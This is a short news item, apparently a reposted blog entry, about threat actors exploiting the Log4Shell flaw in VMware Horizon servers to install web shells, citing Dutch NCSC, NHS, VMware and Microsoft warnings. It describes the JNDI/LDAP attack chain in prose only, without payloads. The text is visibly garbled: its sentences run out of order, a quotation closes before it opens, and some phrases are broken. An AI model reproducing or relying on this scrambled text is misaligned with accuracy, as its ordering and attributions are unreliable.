According to the Dutch agency, threat actors the NCSC will continue to attempt to exploit the Log4Shell flaw in future attacks. Recently the Dutch National Cybersecurity Centre (NCSC) warned organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability.
Multiple VMWare products, including VMware Horizon products, are impacted by remote code execution vulnerabilities via Apache Log4j (CVE-2021-44228, CVE-2021-45046). In an email to Bleeping Computer today, VMware said they are strongly urging customers to patch their Horizon servers to defend against these active attacks. Upon exploiting log4J flaws, threat actors deploy custom web shells into the VM Blast Secure Gateway service to gain access to the networks of target organizations. Once installed a web shell, threat actors can use it to carry out a broad range of malicious activities, such as deploying data exfiltration or deployment of ransomware. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.” “The attack likely consists of a reconnaissance phase, where the attacker uses theJava Naming and Directory Interface TM (JNDI) via Log4Shell payloads to call back to malicious infrastructure. “An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.” reads the security advisory published by NHS.
The security team at the UK National Health Service (NHS) also announced to have spotted threat actors exploiting the Log4Shell vulnerability to hack VMWare Horizon servers and install web shells. Microsoft Security Intelligence January 11, 2022 We have observed a China-based ransomware operator that we’re tracking as DEV-0401 exploiting the CVE-2021-44228 vulnerability in Log4j 2 (aka #log4shell) targeting internet-facing systems running VMWare Horizon.
0 kommentar(er)
